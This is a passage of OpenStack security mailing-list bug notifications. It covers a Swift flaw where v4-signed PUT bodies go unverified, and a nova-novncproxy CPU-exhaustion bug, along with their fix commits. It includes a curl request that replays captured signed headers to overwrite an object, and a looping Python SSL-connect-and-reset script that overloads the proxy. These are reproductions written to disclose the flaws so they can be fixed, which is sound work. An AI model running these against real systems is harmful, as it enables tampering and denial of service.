Change-Id: I803e0dc6861786db44cbcf5943032424ba319d54 commit a563ba26fa3d9dfb23b368ed79940c19e3a9135c Author: HCLTech-SSW Date: Mon May 14 23:23:57 2018 -0700 Implemented the fix to handle the HTTP request methods other than GET. Change-Id: I8db01a5a59f72c562aa8039b459a965283b1b3ad Closes-Bug: #1695855 ** Tags added: in-feature-losf -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1816727 at bugs.launchpad.net Fri Mar 29 21:07:03 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 29 Mar 2019 21:07:03 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155389362341.17717.10300129098249857198.malone@gac.canonical.com> Reviewed: https://review.openstack.org/644998 Committed: https://git.openstack.org/cgit/openstack/nova/commit/?id=e4fa061f17353f49615d4850b562699d55a0641b Submitter: Zuul Branch: master commit e4fa061f17353f49615d4850b562699d55a0641b Author: melanie witt Date: Wed Mar 20 19:01:33 2019 +0000 Move create of ComputeAPI object in websocketproxy Currently, we create a compute.rpcapi.ComputeAPI object during NovaProxyRequestHandler.__init__ in order to make calls to nova-compute for console token authorizations (port validation). This is problematic in the event that we receive a TCP RST as it results in constructing a ComputeAPI object only to throw it away and a large number of TCP RST sent can cause excessive resource consumption. This moves the creation of the ComputeAPI object from __init__ to being lazily instantiated upon first use by access of a property, thus avoiding creation of ComputeAPI objects when we receive TCP RST messages. Closes-Bug: #1816727 Change-Id: I3fe5540ea460fb32767b5e681295fdaf89ce17c5 ** Changed in: nova Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions